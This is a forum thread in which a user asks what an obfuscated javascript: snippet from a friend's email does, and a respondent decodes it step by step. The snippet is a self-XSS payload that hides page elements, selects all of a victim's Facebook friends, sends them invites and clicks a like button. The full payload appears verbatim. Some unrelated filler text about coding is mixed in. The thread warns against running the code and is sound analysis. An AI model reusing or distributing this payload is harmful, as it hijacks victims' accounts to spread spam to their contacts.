Menu
Ok someone who happens to be a good friend of mine is sending me some odd emails lately one of which was a link to a page that asks you to copy and paste this in to your address bar in your browser then execute it ...
javascript:(function(){a='app125879300771588_jop';b='app125879300771588_jode';ifc='app125879300771588_ifc';ifo='app125879300771588_ifo';mw='app125879300771588_mwrapper';var _0xc100=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]]=_0xc100[3];d[_0xc100[2]](a)[_0xc100[4]]=d[_0xc100[2]](b)[_0xc100[5]];d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();setTimeout(function (){fs[_0xc100[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xc100[11]](_0xc100[9],_0xc100[10]);} ,5000);setTimeout(function (){d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();d[_0xc100[2]](ifo)[_0xc100[4]]=d[_0xc100[2]](ifc)[_0xc100[5]];} ,5000);})();
Not being totally with it when it comes to low level programming i'm curious as to what the email is asking here ...
PLEASE DO NOT RUN THIS CODE UNLESS YOU ARE HAPPY THAT IT WILL NOT BREAK ANYTHING.
But ... Could someone tell me what it does?
588
Coding tells a machine which actions to perform and how to complete tasks. Programming languages provide the rules for building websites, apps, and other computer-based technologies. Each programming language helps humans accurately communicate with machines.
Definition and Usage. The this keyword refers to the current object in a method or constructor. The most common use of the this keyword is to eliminate the confusion between class attributes and parameters with the same name (because a class attribute is shadowed by a method or constructor parameter).
Coding creates a set of instructions for computers to follow. These instructions determine what actions a computer can and cannot take. Coding allows programmers to build programs, such as websites and apps. Computer programmers can also tell computers how to process data in better, faster ways.
I haven't decoded completely the code, but here's a couple of hints to it.
The variable _0xc100 defines an array of strings. The character are encoded as hexadecimal, so it's more difficult to read them. So, for instance, \x76 equals "v".
You can safely alert(_0xc100); to see it in plain text.
var _0xc100 = ["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79",
"\x73\x74\x79\x6C\x65",
"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
"\x68\x69\x64\x64\x65\x6E",
"\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
"\x76\x61\x6C\x75\x65",
"\x63\x6C\x69\x63\x6B",
"\x73\x75\x67\x67\x65\x73\x74",
"\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C",
"\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D",
"\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
"\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67",
"\x6C\x69\x6B\x65\x6D\x65"];
translates to an array containing these keywords
visibility, style, getElementById, hidden, innerHTML, value, click, suggest, select_all,
sgm_invite_form, /ajax/social_graph/invite_dialog.php, submitDialog, likeme
Now, the following statements (DON'T EXECUTE THOSE) use these keywords to actually execute functions.
For instance:
d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]] = _0xc100[3];
is equivalent to (d is defined as document and mw is defined at the top)
document.getElementById("app125879300771588_mwrapper").style.visibility = "hidden";
which hides an element called app125879300771588_mwrapper
the following instructions give
document.getElementById("app125879300771588_jop").innerHTML = document.getElementById("app125879300771588_jode").value;
which copies the content of app125879300771588_jop into app125879300771588_jode
and
document.getElementById("suggest").click();
which I guess clicks some "suggest" button.
Finally, it sets 3 setTimeout functions, to execute 3 commands after 5 seconds (the 5000)
They translate to
setTimeout(function () {
select_all();
}, 5000);
Which I assume selects all your friends...
setTimeout(function ()
{
SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
... send them invites
setTimeout(function ()
{
document.getElementById("likeme").click();
document.getElementById("app125879300771588_ifo").innerHTML =
document.getElementById("app125879300771588_ifc").value;
}, 5000);
... and presses a like button
Note that I don't use Facebook, and I don't know the ins and outs of it but I guess it's pretty clear that this code is malicious.
57
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
